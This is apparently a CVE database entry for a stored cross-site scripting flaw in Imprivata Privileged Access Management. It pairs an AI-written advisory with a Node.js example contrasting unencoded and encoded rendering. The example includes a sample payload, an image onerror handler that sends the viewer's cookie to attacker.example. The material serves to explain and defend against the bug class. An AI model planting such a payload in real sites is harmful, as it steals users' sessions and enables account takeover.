CVE-2021-45094
Description
Imprivata Privileged Access Management (formerly Xton Privileged Access Management) 2.3.202112051108 allows XSS.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stored XSS in Imprivata PAM 2.3.202112051108 allows low-privileged attackers to escalate to System Administrator.
Vulnerability
A stored cross-site scripting (XSS) vulnerability exists in Imprivata Privileged Access Management (formerly Xton PAM), version 2.3.202112051108 [1]. The vulnerability is present in at least two areas of the application, allowing injection of arbitrary JavaScript that is stored and executed when other users access the affected pages [1].
Exploitation
An attacker with a low-privileged account can inject malicious script into input fields that are not properly sanitized. When an administrator or other user views the affected area, the script executes in that user's browser context, with that user's session and privileges [1]. The researcher demonstrated that this can be used to escalate privileges; the public reference does not detail the exact steps, but notes that an initial patch was incomplete and could still be bypassed in at least one of the affected areas [1].
Impact
Successful exploitation allows the attacker to escalate from a low-privileged user to System Administrator, gaining full control over the PAM instance and access to managed secrets and sessions [1]. This compromises confidentiality, integrity, and availability of the system and its managed resources.
Mitigation
Imprivata released a patch for this vulnerability, but the initial patch did not fully address the issue in all affected areas [1]. Users should contact Imprivata support to obtain the latest patched version and apply it promptly. No workarounds have been publicly documented [1].
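The following is an added illustration of the bug class described in the Exploitation and Mitigation sections above, written as a generic Node.js snippet; it is not Imprivata's code and does not reflect how the product stores or renders data or what its patch changed. The record store, the "description" field name, the sample payload and the attacker host are constructed for the example. It shows a stored user-controlled value being concatenated into HTML (the vulnerable pattern) beside the same listing with output encoding applied (the generic fix), plus a crude check a tester can run over rendered output.

```javascript
// Added example (not Imprivata's code): stored XSS via unencoded output,
// and the same listing hardened with HTML entity encoding at render time.
// The field name "description", the in-memory store and the payload are
// assumptions made for illustration only.

// Constructed stand-in for the application's database.
const records = [];

// A low-privileged user submits a record. Neither version filters input
// here; the difference between the two renderers is purely at output.
function storeRecord(owner, description) {
  records.push({ owner, description });
}

// VULNERABLE: the stored value is interpolated directly into markup, so a
// payload such as <img onerror=...> is parsed and executed in the browser
// of whoever views the listing, e.g. a System Administrator.
function renderVulnerable() {
  return records
    .map(r => `<tr><td>${r.owner}</td><td>${r.description}</td></tr>`)
    .join('\n');
}

// HTML entity encoding for values placed in element text or quoted
// attribute values. Encoding '/' as well blocks closing-tag tricks.
function escapeHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, ch => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
  })[ch]);
}

// HARDENED: every untrusted field is encoded when rendered, so the
// payload is displayed as literal text instead of being parsed as markup.
function renderHardened() {
  return records
    .map(r => `<tr><td>${escapeHtml(r.owner)}</td><td>${escapeHtml(r.description)}</td></tr>`)
    .join('\n');
}

// Crude tester's check over rendered output: does a raw opening tag with
// the given name survive unencoded? A real assessment confirms execution
// in a browser, but this catches the obvious failure in unit tests.
function containsRawTag(html, tagName) {
  return new RegExp(`<${tagName}[\\s>]`, 'i').test(html);
}

// Constructed payload: on load failure, ship the viewing user's cookie to
// a hypothetical attacker host. This is the low-privilege-to-admin path
// the page describes in the abstract; the specific vector is assumed.
const PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';
storeRecord('lowpriv', PAYLOAD);

// Stand-alone run: prints true for the vulnerable render, false for the
// hardened one.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable render contains raw <img>:', containsRawTag(renderVulnerable(), 'img'));
  console.log('hardened render contains raw <img>:', containsRawTag(renderHardened(), 'img'));
}
```

Output encoding is the minimum fix for this class; in a PAM deployment it should be paired with a Content-Security-Policy that disallows inline script and with `HttpOnly` session cookies, so that a residual injection cannot run arbitrary code or read the administrator's session from JavaScript. Note that an encoding helper like this one protects HTML text and quoted-attribute contexts only; values placed inside script blocks, URLs or CSS need context-specific encoding.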
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Imprivata / Privileged Access Management
  - Range: = 2.3.202112051108
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References (3)
News mentions
No linked articles in our index yet.